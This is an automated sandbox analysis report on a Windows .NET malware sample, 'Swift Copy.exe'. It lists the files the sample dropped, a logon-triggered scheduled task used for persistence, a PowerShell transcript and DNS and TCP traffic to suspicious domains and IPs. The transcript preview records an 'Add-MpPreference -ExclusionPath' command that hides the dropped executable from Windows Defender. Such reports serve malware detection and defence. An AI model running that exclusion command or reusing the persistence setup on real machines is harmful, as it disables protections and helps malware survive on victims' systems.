SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rlnywwb4.hev.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1crm10v.d0k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\tmpE16E.tmp

Download File

Process:	C:\Users\user\Desktop\Swift Copy.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1598
Entropy (8bit):	5.150122293480084
Encrypted:	false
SSDEEP:	24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTcv
MD5:	7ADFF2CBF1E01AF88D3EED7E905CCA35
SHA1:	39CA78F7F44C9777C94C7EE8C0C3DE2439E38E49
SHA-256:	7E1B747AB5522CC5F787C2C0D1CDFD309A83F2172C57E3C71CFC7DACE57D9B22
SHA-512:	7BA1CD52047EB744B81F34089B8FE44B74F8416ADD6F32F89A5F4677C4FCFE1CD8D1547DC6A2E235FAE6C09E37A875C3CB10D3CB1703340F42EF1CD3520C012C
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <

C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe

Download File

Process:	C:\Users\user\Desktop\Swift Copy.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	951808
Entropy (8bit):	7.296393499688903
Encrypted:	false
SSDEEP:	12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
MD5:	50D4FB3F5A33007C2F80E5BBAA5E0CCD
SHA1:	26FF500D90184B5E7928CB16E92BBE0E4553E95E
SHA-256:	0BACCE1F09D476C0B84CD699B50152A74DD6BFD2A052749D7B5A3F4A4AE7B7D9
SHA-512:	D6E46C5187CE7AD3021E22937AB20207672BDBD936473A56C78FBA26BDC20ADA47B3F1C21B6058A4941965A60FE37A18CBEF95A19BA9A216F4FE726F1929F7EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 20%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text...tp... ...r.................. ..`.rsrc................t..............@..@.reloc..............................@..B................P.......H....... ...................:..........................................z.(".....}.....(#...o$...}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......................n..}.....{....,..{....o......{....*.s%.

C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Swift Copy.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\Documents\20220811\PowerShell_transcript.562258.BHPHpPz5.20220811062819.txt

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5793
Entropy (8bit):	5.414413496960812
Encrypted:	false
SSDEEP:	96:BZ6h4NbqDo1ZQZrh4NbqDo1Z7/ExEHEjZMh4NbqDo1Z4cEXEXEvbZti:rYEiWWD
MD5:	D946F9E80DA250A03428805266BA205D
SHA1:	E3E581F2D54CA949141B2F6B4632B40D659229A4
SHA-256:	2FE88921A87252CCC07C1A2C128417E75CFC5D412E15D82F759ABDDB00E46F65
SHA-512:	719B1FD781969903B541452DA310AE4B3C716F35838DF31AA38CA95A259A5F57877A1C2B190704518376D120AEC2B868DB340177672BF82330F2D116C5580043
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20220811062822..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..Process ID: 2300..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20220811062822..******************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..********************..Windows PowerShell transcript start..Start time: 20220811063226..Username: computer\user..RunAs User: computer\ha

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.296393499688903
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Swift Copy.exe
File size:	951808
MD5:	50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1:	26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256:	0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
SHA512:	d6e46c5187ce7ad3021e22937ab20207672bdbd936473a56c78fba26bdc20ada47b3f1c21b6058a4941965a60fe37a18cbef95a19ba9a216f4fe726f1929f7ef
SSDEEP:	12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
TLSH:	6815AEEEBA88C45BCF244670F84955F52B66ECE1F021D9AFA893BC31F17229E1117D06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@................................

File Icon


Icon Hash:	00684068688eb200

Static PE Info

General

Entrypoint:	0x4d906e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x62F46401 [Thu Aug 11 02:05:53 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd9014	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xda000	0x10eb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xec000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd7074	0xd7200	False	0.6689424753050552	data	7.431867015823937	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xda000	0x10eb8	0x11000	False	0.06833065257352941	data	4.159011021337183	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xec000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xda130	0x10828	data
RT_GROUP_ICON	0xea958	0x14	data
RT_VERSION	0xea96c	0x398	data
RT_MANIFEST	0xead04	0x1b4	XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 06:29:41.004913092 CEST	49789	80	192.168.2.3	85.159.66.93
Aug 11, 2022 06:29:41.051496029 CEST	80	49789	85.159.66.93	192.168.2.3
Aug 11, 2022 06:29:41.052582026 CEST	49789	80	192.168.2.3	85.159.66.93
Aug 11, 2022 06:29:41.052706957 CEST	49789	80	192.168.2.3	85.159.66.93
Aug 11, 2022 06:29:41.104178905 CEST	80	49789	85.159.66.93	192.168.2.3
Aug 11, 2022 06:29:41.104329109 CEST	49789	80	192.168.2.3	85.159.66.93
Aug 11, 2022 06:29:41.104486942 CEST	49789	80	192.168.2.3	85.159.66.93
Aug 11, 2022 06:29:41.150917053 CEST	80	49789	85.159.66.93	192.168.2.3
Aug 11, 2022 06:29:46.149816990 CEST	49795	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:46.267714977 CEST	80	49795	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:46.267913103 CEST	49795	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:46.268229961 CEST	49795	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:46.389197111 CEST	80	49795	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:46.389247894 CEST	80	49795	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:46.389276028 CEST	80	49795	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:46.389367104 CEST	49795	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:47.277070045 CEST	49795	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.293478012 CEST	49798	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.410542011 CEST	80	49798	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:48.410737991 CEST	49798	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.410831928 CEST	49798	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.527884007 CEST	80	49798	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:48.527945042 CEST	80	49798	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:48.527968884 CEST	80	49798	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:48.528224945 CEST	49798	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.533154964 CEST	49798	80	192.168.2.3	192.3.130.2
Aug 11, 2022 06:29:48.649930954 CEST	80	49798	192.3.130.2	192.168.2.3
Aug 11, 2022 06:29:53.595129967 CEST	49819	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:53.627001047 CEST	80	49819	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:53.627124071 CEST	49819	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:53.627378941 CEST	49819	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:53.659173965 CEST	80	49819	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:53.659858942 CEST	80	49819	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:53.659890890 CEST	80	49819	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:53.659977913 CEST	49819	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:54.637404919 CEST	49819	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.653481007 CEST	49821	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.692890882 CEST	80	49821	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:55.693022013 CEST	49821	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.693173885 CEST	49821	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.732132912 CEST	80	49821	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:55.733656883 CEST	80	49821	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:55.733702898 CEST	80	49821	51.159.175.169	192.168.2.3
Aug 11, 2022 06:29:55.733865023 CEST	49821	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.734193087 CEST	49821	80	192.168.2.3	51.159.175.169
Aug 11, 2022 06:29:55.773124933 CEST	80	49821	51.159.175.169	192.168.2.3
Aug 11, 2022 06:30:00.805016994 CEST	49822	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:01.025130033 CEST	80	49822	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:01.025422096 CEST	49822	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:01.027570009 CEST	49822	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:01.247374058 CEST	80	49822	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:01.248380899 CEST	80	49822	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:01.248414993 CEST	80	49822	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:01.248611927 CEST	49822	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:02.028383017 CEST	49822	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.044779062 CEST	49823	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.265038013 CEST	80	49823	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:03.265213966 CEST	49823	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.300090075 CEST	49823	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.519531965 CEST	80	49823	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:03.520287991 CEST	80	49823	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:03.520359993 CEST	80	49823	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:03.520493984 CEST	49823	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.520596027 CEST	49823	80	192.168.2.3	103.67.235.120
Aug 11, 2022 06:30:03.739808083 CEST	80	49823	103.67.235.120	192.168.2.3
Aug 11, 2022 06:30:08.932589054 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:09.120799065 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:09.120955944 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:09.121141911 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:09.309082031 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.063811064 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.063870907 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.063914061 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.063941002 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.063992023 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064032078 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064073086 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064121962 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064165115 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.064174891 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.064208984 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064254045 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064273119 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.064316034 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.064666033 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.122713089 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252357960 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252438068 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252470016 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252516985 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252537012 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252578020 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252595901 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252636909 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252654076 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252696037 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252713919 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252753019 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252772093 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252810001 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252830029 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252868891 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252886057 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252908945 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.252939939 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.252978086 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253005981 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253046036 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253084898 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253127098 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253158092 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253205061 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253218889 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253247976 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253276110 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253331900 CEST	80	49825	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:10.253345013 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:10.253371954 CEST	49825	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:11.138535976 CEST	49828	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:11.325625896 CEST	80	49828	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:11.325745106 CEST	49828	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:11.325797081 CEST	49828	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:11.512788057 CEST	80	49828	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:12.432917118 CEST	80	49828	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:12.432960987 CEST	80	49828	103.92.235.55	192.168.2.3
Aug 11, 2022 06:30:12.433083057 CEST	49828	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:12.433135986 CEST	49828	80	192.168.2.3	103.92.235.55
Aug 11, 2022 06:30:12.621766090 CEST	80	49828	103.92.235.55	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 11, 2022 06:29:40.930696964 CEST	51391	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:29:40.999190092 CEST	53	51391	8.8.8.8	192.168.2.3
Aug 11, 2022 06:29:46.130723953 CEST	64452	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:29:46.148622990 CEST	53	64452	8.8.8.8	192.168.2.3
Aug 11, 2022 06:29:53.546819925 CEST	61380	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:29:53.592797995 CEST	53	61380	8.8.8.8	192.168.2.3
Aug 11, 2022 06:30:00.766990900 CEST	63146	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:30:00.802969933 CEST	53	63146	8.8.8.8	192.168.2.3
Aug 11, 2022 06:30:08.537314892 CEST	58625	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:30:08.931277990 CEST	53	58625	8.8.8.8	192.168.2.3
Aug 11, 2022 06:30:17.436986923 CEST	50778	53	192.168.2.3	8.8.8.8
Aug 11, 2022 06:30:17.702488899 CEST	53	50778	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 11, 2022 06:29:40.930696964 CEST	192.168.2.3	8.8.8.8	0xa222	Standard query (0)	www.blackyaga.xyz	A (IP address)	IN (0x0001)
Aug 11, 2022 06:29:46.130723953 CEST	192.168.2.3	8.8.8.8	0xc076	Standard query (0)	www.expectedclosure.one	A (IP address)	IN (0x0001)
Aug 11, 2022 06:29:53.546819925 CEST	192.168.2.3	8.8.8.8	0xd218	Standard query (0)	www.kinemartigues.com	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:00.766990900 CEST	192.168.2.3	8.8.8.8	0x4560	Standard query (0)	www.epic45.co.uk	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:08.537314892 CEST	192.168.2.3	8.8.8.8	0x6161	Standard query (0)	www.mogdento.com	A (IP address)	IN (0x0001)
Aug 11, 2022 06:30:17.436986923 CEST	192.168.2.3	8.8.8.8	0x6147	Standard query (0)	www.posinet1.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 11, 2022 06:29:40.999190092 CEST	8.8.8.8	192.168.2.3	0xa222	No error (0)	www.blackyaga.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)
Aug 11, 2022 06:29:40.999190092 CEST	8.8.8.8	192.168.2.3	0xa222	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)
Aug 11, 2022 06:29:40.999190092 CEST	8.8.8.8	192.168.2.3	0xa222	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)
Aug 11, 2022 06:29:46.148622990 CEST	8.8.8.8	192.168.2.3	0xc076	No error (0)	www.expectedclosure.one		192.3.130.2	A (IP address)	IN (0x0001)
Aug 11, 2022 06:29:53.592797995 CEST	8.8.8.8	192.168.2.3	0xd218	No error (0)	www.kinemartigues.com	kinemartigues.com		CNAME (Canonical name)	IN (0x0001)
